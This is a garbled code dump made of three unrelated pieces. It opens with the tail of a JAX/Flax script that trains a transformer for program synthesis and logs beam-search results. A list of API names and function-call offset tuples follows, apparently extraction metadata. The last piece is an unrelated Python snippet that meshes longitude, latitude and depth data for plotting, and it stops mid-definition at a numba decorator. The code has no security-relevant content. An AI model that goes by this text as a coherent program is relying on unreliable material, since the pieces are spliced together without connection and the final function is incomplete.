per_host_sum_pmap( jax.tree_map(np.array, (pred_acc, pred_denominator))) # Record beam search results as text summaries. message = [] for n in np.random.choice(np.arange(len(predictions)), 8): text = (f'ios: {ios[n]}\n\ntarget: {targets[n]}\n\n' f'predicted: {predictions[n]}\n\n' f'top of beam:\n\n{top_of_beams[n]}\n\n') message.append(text) # Write to tensorboard. if jax.host_id() == 0: slow_or_fast = 'slow' if FLAGS.slow_decode else 'fast' logging.info( 'Prediction time, %s (beam %d): %.4f s, step %d, score %.4f', slow_or_fast, beam_size, time.time() - t_inference_start, step, all_pred_acc / all_pred_denominator) summary_writer.scalar( 'predict-{}/score-{}'.format(slow_or_fast, beam_size), all_pred_acc / all_pred_denominator, step) summary_writer.text('samples-{}'.format(beam_size), '\n------\n'.join(message), step) summary_writer.flush() if __name__ == '__main__': app.run(main)
[ "flax.training.common_utils.shard", "flax.optim.Adam", "tensorflow.compat.v2.random.set_seed", "latent_programmer.tasks.robust_fill.tokens.build_token_tables", "absl.logging.info", "jax.tree_map", "latent_programmer.decode.beam_search", "flax.training.common_utils.onehot", "jax.jit", "sys.path.append", "absl.flags.DEFINE_float", "jax.random.split", "jax.random.PRNGKey", "absl.flags.DEFINE_boolean", "absl.app.run", "jax.numpy.asarray", "flax.jax_utils.replicate", "flax.jax_utils.unreplicate", "numpy.random.seed", "jax.value_and_grad", "numpy.tile", "numpy.ceil", "json.loads", "jax.lax.psum", "jax.numpy.where", "jax.numpy.cos", "jax.local_device_count", "jax.devices", "jax.numpy.broadcast_to", "latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformer", "numpy.argmax", "jax.lax.pmean", "jax.numpy.ones", "flax.training.common_utils.get_metrics", "absl.flags.DEFINE_string", "time.time", "jax.host_id", "tensorflow.compat.v2.enable_v2_behavior", "latent_programmer.decomposition_transformer_attention.input_pipeline.create_dataset_from_tf_record", "latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformerConfig", "jax.numpy.minimum", "jax.numpy.logical_and", "absl.flags.DEFINE_bool", "absl.flags.DEFINE_integer", "jax.numpy.sqrt", "os.path.join", "jax.numpy.exp", "random.seed", "jax.numpy.maximum", "collections.defaultdict", "latent_programmer.decode.flat_batch_beam_expand", "functools.partial", "flax.linen.log_softmax", "jax.numpy.argmax" ]
[((1590, 1615), 'sys.path.append', 'sys.path.append', (['"""../../"""'], {}), "('../../')\n", (1605, 1615), False, 'import sys\n'), ((1658, 1724), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""seed"""', '(0)', '"""Fixed random seed for training."""'], {}), "('seed', 0, 'Fixed random seed for training.')\n", (1678, 1724), False, 'from absl import flags\n'), ((1725, 1774), 'absl.flags.DEFINE_float', 'flags.DEFINE_float', (['"""lr"""', '(0.001)', '"""Learning rate."""'], {}), "('lr', 0.001, 'Learning rate.')\n", (1743, 1774), False, 'from absl import flags\n'), ((1774, 1863), 'absl.flags.DEFINE_float', 'flags.DEFINE_float', (['"""weight_decay"""', '(0.1)', '"""Decay factor for AdamW-style weight decay."""'], {}), "('weight_decay', 0.1,\n 'Decay factor for AdamW-style weight decay.')\n", (1792, 1863), False, 'from absl import flags\n'), ((1880, 1946), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""embedding_dim"""', '(256)', '"""Embedding dimension."""'], {}), "('embedding_dim', 256, 'Embedding dimension.')\n", (1900, 1946), False, 'from absl import flags\n'), ((1947, 2007), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""hidden_dim"""', '(512)', '"""Hidden dimension."""'], {}), "('hidden_dim', 512, 'Hidden dimension.')\n", (1967, 2007), False, 'from absl import flags\n'), ((2008, 2065), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""num_heads"""', '(4)', '"""Number of layers."""'], {}), "('num_heads', 4, 'Number of layers.')\n", (2028, 2065), False, 'from absl import flags\n'), ((2066, 2135), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""num_layers"""', '(3)', '"""Number of Transformer heads."""'], {}), "('num_layers', 3, 'Number of Transformer heads.')\n", (2086, 2135), False, 'from absl import flags\n'), ((2136, 2214), 'absl.flags.DEFINE_boolean', 'flags.DEFINE_boolean', (['"""slow_decode"""', '(True)', '"""Use slow decoding for prediction?"""'], {}), "('slow_decode', True, 'Use slow decoding for prediction?')\n", (2156, 2214), False, 'from absl import flags\n'), ((2216, 2305), 'absl.flags.DEFINE_string', 'flags.DEFINE_string', (['"""dataset_filepattern"""', 'None', '"""Filepattern for TFRecord dataset."""'], {}), "('dataset_filepattern', None,\n 'Filepattern for TFRecord dataset.')\n", (2235, 2305), False, 'from absl import flags\n'), ((2322, 2414), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""per_device_batch_size"""', '(16)', '"""Number of program tasks in a batch."""'], {}), "('per_device_batch_size', 16,\n 'Number of program tasks in a batch.')\n", (2342, 2414), False, 'from absl import flags\n'), ((2432, 2527), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""num_strings_per_task"""', '(4)', '"""Number of input/output strings per task."""'], {}), "('num_strings_per_task', 4,\n 'Number of input/output strings per task.')\n", (2452, 2527), False, 'from absl import flags\n'), ((2545, 2636), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""max_program_length"""', '(100)', '"""Maximum number of tokens in program."""'], {}), "('max_program_length', 100,\n 'Maximum number of tokens in program.')\n", (2565, 2636), False, 'from absl import flags\n'), ((2654, 2758), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""max_characters"""', '(120)', '"""Maximum number of characters in input/output strings."""'], {}), "('max_characters', 120,\n 'Maximum number of characters in input/output strings.')\n", (2674, 2758), False, 'from absl import flags\n'), ((2777, 2847), 'absl.flags.DEFINE_string', 'flags.DEFINE_string', (['"""save_dir"""', 'None', '"""Directory to save results to."""'], {}), "('save_dir', None, 'Directory to save results to.')\n", (2796, 2847), False, 'from absl import flags\n'), ((2848, 2925), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""num_train_steps"""', '(2000000)', '"""Number of training steps."""'], {}), "('num_train_steps', 2000000, 'Number of training steps.')\n", (2868, 2925), False, 'from absl import flags\n'), ((2926, 2999), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""num_eval_steps"""', '(10)', '"""Number of evaluation steps."""'], {}), "('num_eval_steps', 10, 'Number of evaluation steps.')\n", (2946, 2999), False, 'from absl import flags\n'), ((3000, 3085), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""log_freq"""', '(1000)', '"""Number of steps between training logs."""'], {}), "('log_freq', 1000, 'Number of steps between training logs.'\n )\n", (3020, 3085), False, 'from absl import flags\n'), ((3081, 3153), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""eval_freq"""', '(2000)', '"""Number of steps between eval."""'], {}), "('eval_freq', 2000, 'Number of steps between eval.')\n", (3101, 3153), False, 'from absl import flags\n'), ((3154, 3254), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""predict_freq"""', '(50000)', '"""Number of steps between prediction (beam search)."""'], {}), "('predict_freq', 50000,\n 'Number of steps between prediction (beam search).')\n", (3174, 3254), False, 'from absl import flags\n'), ((3272, 3367), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""checkpoint_freq"""', '(50000)', '"""Number of steps between checkpoint saves."""'], {}), "('checkpoint_freq', 50000,\n 'Number of steps between checkpoint saves.')\n", (3292, 3367), False, 'from absl import flags\n'), ((3385, 3529), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""finetune_start_step"""', '(-1)', '"""Step the initial checkpoint should start at for finetuning, or -1 if not finetuning."""'], {}), "('finetune_start_step', -1,\n 'Step the initial checkpoint should start at for finetuning, or -1 if not finetuning.'\n )\n", (3405, 3529), False, 'from absl import flags\n'), ((3566, 3671), 'absl.flags.DEFINE_bool', 'flags.DEFINE_bool', (['"""restore_checkpoints"""', '(True)', '"""Whether to restore from existing model checkpoints."""'], {}), "('restore_checkpoints', True,\n 'Whether to restore from existing model checkpoints.')\n", (3583, 3671), False, 'from absl import flags\n'), ((3687, 3852), 'absl.flags.DEFINE_string', 'flags.DEFINE_string', (['"""attention_mask_type"""', '"""bos_full_attention"""', '"""The kind of attention mask to use. Options are: baseline, bos_to_bos, bos_full_attention"""'], {}), "('attention_mask_type', 'bos_full_attention',\n 'The kind of attention mask to use. Options are: baseline, bos_to_bos, bos_full_attention'\n )\n", (3706, 3852), False, 'from absl import flags\n'), ((3888, 3990), 'absl.flags.DEFINE_bool', 'flags.DEFINE_bool', (['"""use_relative_attention"""', '(True)', '"""Whether to use relative positonal embeddings."""'], {}), "('use_relative_attention', True,\n 'Whether to use relative positonal embeddings.')\n", (3905, 3990), False, 'from absl import flags\n'), ((4005, 4131), 'absl.flags.DEFINE_bool', 'flags.DEFINE_bool', (['"""bos_special_attention"""', '(False)', '"""Whether to use special relative attention computation for BOS tokens."""'], {}), "('bos_special_attention', False,\n 'Whether to use special relative attention computation for BOS tokens.')\n", (4022, 4131), False, 'from absl import flags\n'), ((4207, 4296), 'absl.flags.DEFINE_string', 'flags.DEFINE_string', (['"""xm_parameters"""', 'None', '"""String specifying hyperparamter search."""'], {}), "('xm_parameters', None,\n 'String specifying hyperparamter search.')\n", (4226, 4296), False, 'from absl import flags\n'), ((7127, 7173), 'flax.training.common_utils.onehot', 'common_utils.onehot', (['targets', 'logits.shape[-1]'], {}), '(targets, logits.shape[-1])\n', (7146, 7173), False, 'from flax.training import common_utils\n'), ((8564, 8594), 'jax.lax.psum', 'jax.lax.psum', (['metrics', '"""batch"""'], {}), "(metrics, 'batch')\n", (8576, 8594), False, 'import jax\n'), ((9159, 9188), 'jax.random.split', 'jax.random.split', (['dropout_rng'], {}), '(dropout_rng)\n', (9175, 9188), False, 'import jax\n'), ((9719, 9760), 'jax.value_and_grad', 'jax.value_and_grad', (['loss_fn'], {'has_aux': '(True)'}), '(loss_fn, has_aux=True)\n', (9737, 9760), False, 'import jax\n'), ((9818, 9846), 'jax.lax.pmean', 'jax.lax.pmean', (['grad', '"""batch"""'], {}), "(grad, 'batch')\n", (9831, 9846), False, 'import jax\n'), ((12015, 12077), 'latent_programmer.decode.flat_batch_beam_expand', 'decode.flat_batch_beam_expand', (['encoded_padding_mask', 'beam_size'], {}), '(encoded_padding_mask, beam_size)\n', (12044, 12077), False, 'from latent_programmer import decode\n'), ((13395, 13607), 'latent_programmer.decode.beam_search', 'decode.beam_search', (['inputs', 'cache', 'tokens_ids_to_logits'], {'beam_size': 'beam_size', 'alpha': '(0.6)', 'bos_token': 'config.base_config.bos_token', 'eos_token': 'eos_token', 'max_decode_len': 'max_decode_len', 'slow_decode': 'slow_decode'}), '(inputs, cache, tokens_ids_to_logits, beam_size=beam_size,\n alpha=0.6, bos_token=config.base_config.bos_token, eos_token=eos_token,\n max_decode_len=max_decode_len, slow_decode=slow_decode)\n', (13413, 13607), False, 'from latent_programmer import decode\n'), ((14514, 14543), 'collections.defaultdict', 'collections.defaultdict', (['list'], {}), '(list)\n', (14537, 14543), False, 'import collections\n'), ((14555, 14568), 'jax.devices', 'jax.devices', ([], {}), '()\n', (14566, 14568), False, 'import jax\n'), ((15633, 15656), 'tensorflow.compat.v2.enable_v2_behavior', 'tf.enable_v2_behavior', ([], {}), '()\n', (15654, 15656), True, 'import tensorflow.compat.v2 as tf\n'), ((15660, 15690), 'tensorflow.compat.v2.random.set_seed', 'tf.random.set_seed', (['FLAGS.seed'], {}), '(FLAGS.seed)\n', (15678, 15690), True, 'import tensorflow.compat.v2 as tf\n'), ((15693, 15719), 'numpy.random.seed', 'np.random.seed', (['FLAGS.seed'], {}), '(FLAGS.seed)\n', (15707, 15719), True, 'import numpy as np\n'), ((15722, 15745), 'random.seed', 'random.seed', (['FLAGS.seed'], {}), '(FLAGS.seed)\n', (15733, 15745), False, 'import random\n'), ((16766, 16790), 'jax.local_device_count', 'jax.local_device_count', ([], {}), '()\n', (16788, 16790), False, 'import jax\n'), ((17466, 17497), 'latent_programmer.tasks.robust_fill.tokens.build_token_tables', 'dsl_tokens.build_token_tables', ([], {}), '()\n', (17495, 17497), True, 'from latent_programmer.tasks.robust_fill import tokens as dsl_tokens\n'), ((18542, 18579), 'absl.logging.info', 'logging.info', (['"""Initializing dataset."""'], {}), "('Initializing dataset.')\n", (18554, 18579), False, 'from absl import logging\n'), ((18702, 18768), 'absl.logging.info', 'logging.info', (['"""Loading dataset from %s"""', 'FLAGS.dataset_filepattern'], {}), "('Loading dataset from %s', FLAGS.dataset_filepattern)\n", (18714, 18768), False, 'from absl import logging\n'), ((18837, 18885), 'absl.logging.info', 'logging.info', (['"""padded_shapes: %s"""', 'padded_shapes'], {}), "('padded_shapes: %s', padded_shapes)\n", (18849, 18885), False, 'from absl import logging\n'), ((18898, 19004), 'latent_programmer.decomposition_transformer_attention.input_pipeline.create_dataset_from_tf_record', 'input_pipeline.create_dataset_from_tf_record', (['FLAGS.dataset_filepattern', 'token_id_table', 'char_id_table'], {}), '(FLAGS.dataset_filepattern,\n token_id_table, char_id_table)\n', (18942, 19004), False, 'from latent_programmer.decomposition_transformer_attention import input_pipeline\n'), ((20156, 20330), 'latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformerConfig', 'models.DecomposeAttentionTransformerConfig', ([], {'base_config': 'base_config', 'attention_mask_type': 'FLAGS.attention_mask_type', 'bos_special_attention': 'FLAGS.bos_special_attention'}), '(base_config=base_config,\n attention_mask_type=FLAGS.attention_mask_type, bos_special_attention=\n FLAGS.bos_special_attention)\n', (20198, 20330), True, 'from latent_programmer.decomposition_transformer_attention import decomposition_models as models\n'), ((20897, 20927), 'jax.random.PRNGKey', 'jax.random.PRNGKey', (['FLAGS.seed'], {}), '(FLAGS.seed)\n', (20915, 20927), False, 'import jax\n'), ((20993, 21014), 'jax.random.split', 'jax.random.split', (['rng'], {}), '(rng)\n', (21009, 21014), False, 'import jax\n'), ((21022, 21071), 'latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformer', 'models.DecomposeAttentionTransformer', (['eval_config'], {}), '(eval_config)\n', (21058, 21071), True, 'from latent_programmer.decomposition_transformer_attention import decomposition_models as models\n'), ((21301, 21393), 'flax.optim.Adam', 'optim.Adam', (['FLAGS.lr'], {'beta1': '(0.9)', 'beta2': '(0.98)', 'eps': '(1e-09)', 'weight_decay': 'FLAGS.weight_decay'}), '(FLAGS.lr, beta1=0.9, beta2=0.98, eps=1e-09, weight_decay=FLAGS.\n weight_decay)\n', (21311, 21393), False, 'from flax import optim\n'), ((22201, 22231), 'flax.jax_utils.replicate', 'jax_utils.replicate', (['optimizer'], {}), '(optimizer)\n', (22220, 22231), False, 'from flax import jax_utils\n'), ((23679, 23690), 'time.time', 'time.time', ([], {}), '()\n', (23688, 23690), False, 'import time\n'), ((30635, 30648), 'absl.app.run', 'app.run', (['main'], {}), '(main)\n', (30642, 30648), False, 'from absl import app\n'), ((6479, 6514), 'jax.numpy.asarray', 'jnp.asarray', (['ret'], {'dtype': 'jnp.float32'}), '(ret, dtype=jnp.float32)\n', (6490, 6514), True, 'import jax.numpy as jnp\n'), ((7274, 7300), 'jax.numpy.asarray', 'jnp.asarray', (['targets.shape'], {}), '(targets.shape)\n', (7285, 7300), True, 'import jax.numpy as jnp\n'), ((8008, 8035), 'jax.numpy.argmax', 'jnp.argmax', (['logits'], {'axis': '(-1)'}), '(logits, axis=-1)\n', (8018, 8035), True, 'import jax.numpy as jnp\n'), ((8078, 8104), 'jax.numpy.asarray', 'jnp.asarray', (['targets.shape'], {}), '(targets.shape)\n', (8089, 8104), True, 'import jax.numpy as jnp\n'), ((10914, 10935), 'jax.random.PRNGKey', 'jax.random.PRNGKey', (['(0)'], {}), '(0)\n', (10932, 10935), False, 'import jax\n'), ((10943, 10972), 'jax.numpy.ones', 'jnp.ones', (['inputs.shape', 'dtype'], {}), '(inputs.shape, dtype)\n', (10951, 10972), True, 'import jax.numpy as jnp\n'), ((10980, 11010), 'jax.numpy.ones', 'jnp.ones', (['outputs.shape', 'dtype'], {}), '(outputs.shape, dtype)\n', (10988, 11010), True, 'import jax.numpy as jnp\n'), ((11018, 11047), 'jax.numpy.ones', 'jnp.ones', (['target_shape', 'dtype'], {}), '(target_shape, dtype)\n', (11026, 11047), True, 'import jax.numpy as jnp\n'), ((14867, 14899), 'jax.tree_map', 'jax.tree_map', (['(lambda x: x[0])', 'xs'], {}), '(lambda x: x[0], xs)\n', (14879, 14899), False, 'import jax\n'), ((16797, 16810), 'jax.host_id', 'jax.host_id', ([], {}), '()\n', (16808, 16810), False, 'import jax\n'), ((20960, 20973), 'jax.host_id', 'jax.host_id', ([], {}), '()\n', (20971, 20973), False, 'import jax\n'), ((21094, 21109), 'jax.jit', 'jax.jit', (['m.init'], {}), '(m.init)\n', (21101, 21109), False, 'import jax\n'), ((21166, 21197), 'jax.numpy.ones', 'jnp.ones', (['io_shape', 'jnp.float32'], {}), '(io_shape, jnp.float32)\n', (21174, 21197), True, 'import jax.numpy as jnp\n'), ((21205, 21236), 'jax.numpy.ones', 'jnp.ones', (['io_shape', 'jnp.float32'], {}), '(io_shape, jnp.float32)\n', (21213, 21236), True, 'import jax.numpy as jnp\n'), ((21244, 21280), 'jax.numpy.ones', 'jnp.ones', (['program_shape', 'jnp.float32'], {}), '(program_shape, jnp.float32)\n', (21252, 21280), True, 'import jax.numpy as jnp\n'), ((21867, 21931), 'absl.logging.info', 'logging.info', (['"""Found model checkpointed at step %d."""', 'start_step'], {}), "('Found model checkpointed at step %d.', start_step)\n", (21879, 21931), False, 'from absl import logging\n'), ((22670, 22760), 'functools.partial', 'functools.partial', (['train_step'], {'learning_rate_fn': 'learning_rate_fn', 'config': 'train_config'}), '(train_step, learning_rate_fn=learning_rate_fn, config=\n train_config)\n', (22687, 22760), False, 'import functools\n'), ((22845, 22914), 'functools.partial', 'functools.partial', (['eval_step'], {'eos_token': 'eos_token', 'config': 'eval_config'}), '(eval_step, eos_token=eos_token, config=eval_config)\n', (22862, 22914), False, 'import functools\n'), ((23022, 23125), 'functools.partial', 'functools.partial', (['initialize_cache'], {'max_decode_len': 'FLAGS.max_program_length', 'config': 'predict_config'}), '(initialize_cache, max_decode_len=FLAGS.max_program_length,\n config=predict_config)\n', (23039, 23125), False, 'import functools\n'), ((23211, 23363), 'functools.partial', 'functools.partial', (['predict_step'], {'eos_token': 'eos_token', 'max_decode_len': 'FLAGS.max_program_length', 'config': 'predict_config', 'slow_decode': 'FLAGS.slow_decode'}), '(predict_step, eos_token=eos_token, max_decode_len=FLAGS.\n max_program_length, config=predict_config, slow_decode=FLAGS.slow_decode)\n', (23228, 23363), False, 'import functools\n'), ((23614, 23638), 'jax.local_device_count', 'jax.local_device_count', ([], {}), '()\n', (23636, 23638), False, 'import jax\n'), ((9202, 9231), 'jax.numpy.where', 'jnp.where', (['(programs > 0)', '(1)', '(0)'], {}), '(programs > 0, 1, 0)\n', (9211, 9231), True, 'import jax.numpy as jnp\n'), ((10440, 10484), 'latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformer', 'models.DecomposeAttentionTransformer', (['config'], {}), '(config)\n', (10476, 10484), True, 'from latent_programmer.decomposition_transformer_attention import decomposition_models as models\n'), ((10857, 10901), 'latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformer', 'models.DecomposeAttentionTransformer', (['config'], {}), '(config)\n', (10893, 10901), True, 'from latent_programmer.decomposition_transformer_attention import decomposition_models as models\n'), ((11936, 11964), 'jax.numpy.where', 'jnp.where', (['(outputs > 0)', '(1)', '(0)'], {}), '(outputs > 0, 1, 0)\n', (11945, 11964), True, 'import jax.numpy as jnp\n'), ((14151, 14176), 'numpy.tile', 'np.tile', (['x[-1]', 'tile_dims'], {}), '(x[-1], tile_dims)\n', (14158, 14176), True, 'import numpy as np\n'), ((14696, 14716), 'jax.lax.psum', 'jax.lax.psum', (['x', '"""i"""'], {}), "(x, 'i')\n", (14708, 14716), False, 'import jax\n'), ((16873, 16919), 'os.path.join', 'os.path.join', (['FLAGS.save_dir', '"""tb"""', 'hparam_str'], {}), "(FLAGS.save_dir, 'tb', hparam_str)\n", (16885, 16919), False, 'import os\n'), ((19322, 19346), 'numpy.ceil', 'np.ceil', (['(batch_size / 10)'], {}), '(batch_size / 10)\n', (19329, 19346), True, 'import numpy as np\n'), ((21730, 21785), 'os.path.join', 'os.path.join', (['FLAGS.save_dir', '"""checkpoints"""', 'hparam_str'], {}), "(FLAGS.save_dir, 'checkpoints', hparam_str)\n", (21742, 21785), False, 'import os\n'), ((21976, 22092), 'absl.logging.info', 'logging.info', (['"""Checking that start_step (%s) == finetune_start_step (%s)"""', 'start_step', 'FLAGS.finetune_start_step'], {}), "('Checking that start_step (%s) == finetune_start_step (%s)',\n start_step, FLAGS.finetune_start_step)\n", (21988, 22092), False, 'from absl import logging\n'), ((24500, 24543), 'absl.logging.info', 'logging.info', (['"""Gathering training metrics."""'], {}), "('Gathering training metrics.')\n", (24512, 24543), False, 'from absl import logging\n'), ((24564, 24601), 'flax.training.common_utils.get_metrics', 'common_utils.get_metrics', (['metrics_all'], {}), '(metrics_all)\n', (24588, 24601), False, 'from flax.training import common_utils\n'), ((24674, 24708), 'jax.tree_map', 'jax.tree_map', (['jnp.sum', 'metrics_all'], {}), '(jnp.sum, metrics_all)\n', (24686, 24708), False, 'import jax\n'), ((24777, 24830), 'jax.tree_map', 'jax.tree_map', (['(lambda x: x / denominator)', 'metrics_sums'], {}), '(lambda x: x / denominator, metrics_sums)\n', (24789, 24830), False, 'import jax\n'), ((25673, 25718), 'absl.logging.info', 'logging.info', (['"""Gathering evaluation metrics."""'], {}), "('Gathering evaluation metrics.')\n", (25685, 25718), False, 'from absl import logging\n'), ((25746, 25757), 'time.time', 'time.time', ([], {}), '()\n', (25755, 25757), False, 'import time\n'), ((26031, 26069), 'flax.training.common_utils.get_metrics', 'common_utils.get_metrics', (['eval_metrics'], {}), '(eval_metrics)\n', (26055, 26069), False, 'from flax.training import common_utils\n'), ((26096, 26131), 'jax.tree_map', 'jax.tree_map', (['jnp.sum', 'eval_metrics'], {}), '(jnp.sum, eval_metrics)\n', (26108, 26131), False, 'import jax\n'), ((26215, 26278), 'jax.tree_map', 'jax.tree_map', (['(lambda x: x / eval_denominator)', 'eval_metrics_sums'], {}), '(lambda x: x / eval_denominator, eval_metrics_sums)\n', (26227, 26278), False, 'import jax\n'), ((26753, 26799), 'absl.logging.info', 'logging.info', (['"""Gathering beam search metrics."""'], {}), "('Gathering beam search metrics.')\n", (26765, 26799), False, 'from absl import logging\n'), ((7209, 7231), 'flax.linen.log_softmax', 'nn.log_softmax', (['logits'], {}), '(logits)\n', (7223, 7231), True, 'from flax import linen as nn\n'), ((9332, 9376), 'latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformer', 'models.DecomposeAttentionTransformer', (['config'], {}), '(config)\n', (9368, 9376), True, 'from latent_programmer.decomposition_transformer_attention import decomposition_models as models\n'), ((11711, 11755), 'latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformer', 'models.DecomposeAttentionTransformer', (['config'], {}), '(config)\n', (11747, 11755), True, 'from latent_programmer.decomposition_transformer_attention import decomposition_models as models\n'), ((14794, 14829), 'jax.numpy.broadcast_to', 'jnp.broadcast_to', (['x', '((1,) + x.shape)'], {}), '(x, (1,) + x.shape)\n', (14810, 14829), True, 'import jax.numpy as jnp\n'), ((16452, 16483), 'json.loads', 'json.loads', (['FLAGS.xm_parameters'], {}), '(FLAGS.xm_parameters)\n', (16462, 16483), False, 'import json\n'), ((24132, 24145), 'jax.host_id', 'jax.host_id', ([], {}), '()\n', (24143, 24145), False, 'import jax\n'), ((25038, 25062), 'jax.numpy.exp', 'jnp.exp', (["summary['loss']"], {}), "(summary['loss'])\n", (25045, 25062), True, 'import jax.numpy as jnp\n'), ((25087, 25100), 'jax.host_id', 'jax.host_id', ([], {}), '()\n', (25098, 25100), False, 'import jax\n'), ((25115, 25183), 'absl.logging.info', 'logging.info', (['"""Train in step: %d, loss: %.4f"""', 'step', "summary['loss']"], {}), "('Train in step: %d, loss: %.4f', step, summary['loss'])\n", (25127, 25183), False, 'from absl import logging\n'), ((25199, 25210), 'time.time', 'time.time', ([], {}), '()\n', (25208, 25210), False, 'import time\n'), ((25868, 25895), 'flax.training.common_utils.shard', 'common_utils.shard', (['batches'], {}), '(batches)\n', (25886, 25895), False, 'from flax.training import common_utils\n'), ((26348, 26361), 'jax.host_id', 'jax.host_id', ([], {}), '()\n', (26359, 26361), False, 'import jax\n'), ((26871, 26882), 'time.time', 'time.time', ([], {}), '()\n', (26880, 26882), False, 'import time\n'), ((5777, 5814), 'jax.numpy.minimum', 'jnp.minimum', (['(1.0)', '(step / warmup_steps)'], {}), '(1.0, step / warmup_steps)\n', (5788, 5814), True, 'import jax.numpy as jnp\n'), ((10276, 10361), 'jax.numpy.logical_and', 'jnp.logical_and', (['(programs != config.base_config.bos_token)', '(programs != eos_token)'], {}), '(programs != config.base_config.bos_token, programs != eos_token\n )\n', (10291, 10361), True, 'import jax.numpy as jnp\n'), ((12255, 12306), 'latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformer', 'models.DecomposeAttentionTransformer', ([], {'config': 'config'}), '(config=config)\n', (12291, 12306), True, 'from latent_programmer.decomposition_transformer_attention import decomposition_models as models\n'), ((12693, 12744), 'latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformer', 'models.DecomposeAttentionTransformer', ([], {'config': 'config'}), '(config=config)\n', (12729, 12744), True, 'from latent_programmer.decomposition_transformer_attention import decomposition_models as models\n'), ((24254, 24309), 'os.path.join', 'os.path.join', (['FLAGS.save_dir', '"""checkpoints"""', 'hparam_str'], {}), "(FLAGS.save_dir, 'checkpoints', hparam_str)\n", (24266, 24309), False, 'import os\n'), ((24323, 24355), 'flax.jax_utils.unreplicate', 'jax_utils.unreplicate', (['optimizer'], {}), '(optimizer)\n', (24344, 24355), False, 'from flax import jax_utils\n'), ((27557, 27587), 'flax.training.common_utils.shard', 'common_utils.shard', (['pred_batch'], {}), '(pred_batch)\n', (27575, 27587), False, 'from flax.training import common_utils\n'), ((29522, 29574), 'jax.tree_map', 'jax.tree_map', (['np.array', '(pred_acc, pred_denominator)'], {}), '(np.array, (pred_acc, pred_denominator))\n', (29534, 29574), False, 'import jax\n'), ((29972, 29985), 'jax.host_id', 'jax.host_id', ([], {}), '()\n', (29983, 29985), False, 'import jax\n'), ((26458, 26469), 'time.time', 'time.time', ([], {}), '()\n', (26467, 26469), False, 'import time\n'), ((28579, 28611), 'absl.logging.info', 'logging.info', (['"""ios: %s"""', 'ios[-1]'], {}), "('ios: %s', ios[-1])\n", (28591, 28611), False, 'from absl import logging\n'), ((28624, 28663), 'absl.logging.info', 'logging.info', (['"""target: %s"""', 'targets[-1]'], {}), "('target: %s', targets[-1])\n", (28636, 28663), False, 'from absl import logging\n'), ((5873, 5910), 'jax.numpy.maximum', 'jnp.maximum', (['(1.0)', '(step - warmup_steps)'], {}), '(1.0, step - warmup_steps)\n', (5884, 5910), True, 'import jax.numpy as jnp\n'), ((5972, 5994), 'jax.numpy.sqrt', 'jnp.sqrt', (['warmup_steps'], {}), '(warmup_steps)\n', (5980, 5994), True, 'import jax.numpy as jnp\n'), ((18178, 18209), 'numpy.argmax', 'np.argmax', (['(program == eos_token)'], {}), '(program == eos_token)\n', (18187, 18209), True, 'import numpy as np\n'), ((30196, 30207), 'time.time', 'time.time', ([], {}), '()\n', (30205, 30207), False, 'import time\n'), ((6019, 6050), 'jax.numpy.maximum', 'jnp.maximum', (['step', 'warmup_steps'], {}), '(step, warmup_steps)\n', (6030, 6050), True, 'import jax.numpy as jnp\n'), ((27309, 27349), 'numpy.ceil', 'np.ceil', (['(cur_pred_batch_size / n_devices)'], {}), '(cur_pred_batch_size / n_devices)\n', (27316, 27349), True, 'import numpy as np\n'), ((6365, 6399), 'jax.numpy.cos', 'jnp.cos', (['(jnp.pi * (progress % 1.0))'], {}), '(jnp.pi * (progress % 1.0))\n', (6372, 6399), True, 'import jax.numpy as jnp\n')]
import matplotlib.pyplot as plt import numpy as np import pandas as pd import click import numba def prepare_data(data_pd, parameter): lon_set = set(data_pd["lon"]) lat_set = set(data_pd["lat"]) dep_set = set(data_pd["dep"]) lon_list = sorted(lon_set) lat_list = sorted(lat_set) dep_list = sorted(dep_set) lon_mesh, lat_mesh, dep_mesh = np.meshgrid( lon_list, lat_list, dep_list, indexing="ij") dx, dy, dz = np.shape(lon_mesh) value_mesh = np.zeros_like(lon_mesh) x_mesh = np.zeros_like(lon_mesh) y_mesh = np.zeros_like(lon_mesh) z_mesh = np.zeros_like(lon_mesh) r_mesh = np.zeros_like(lon_mesh) for i in range(dx): for j in range(dy): for k in range(dz): x_mesh[i, j, k], y_mesh[i, j, k], z_mesh[i, j, k], r_mesh[i, j, k] = lld2xyzr( lat_mesh[i, j, k], lon_mesh[i, j, k], dep_mesh[i, j, k]) for index, row in data_pd.iterrows(): i = int(round((row.lon-lon_list[0])/(lon_list[1]-lon_list[0]), 0)) j = int(round((row.lat-lat_list[0])/(lat_list[1]-lat_list[0]), 0)) k = int(round((row.dep-dep_list[0])/(dep_list[1]-dep_list[0]), 0)) value_mesh[i, j, k] = row[parameter] return x_mesh, y_mesh, z_mesh, value_mesh def get_value(data_pd, lat, lon, dep, parameter): return data_pd.loc[(data_pd.lat == lat) & (data_pd.lon == lon) & (data_pd.dep == dep)][parameter].values[0] @numba.njit() def 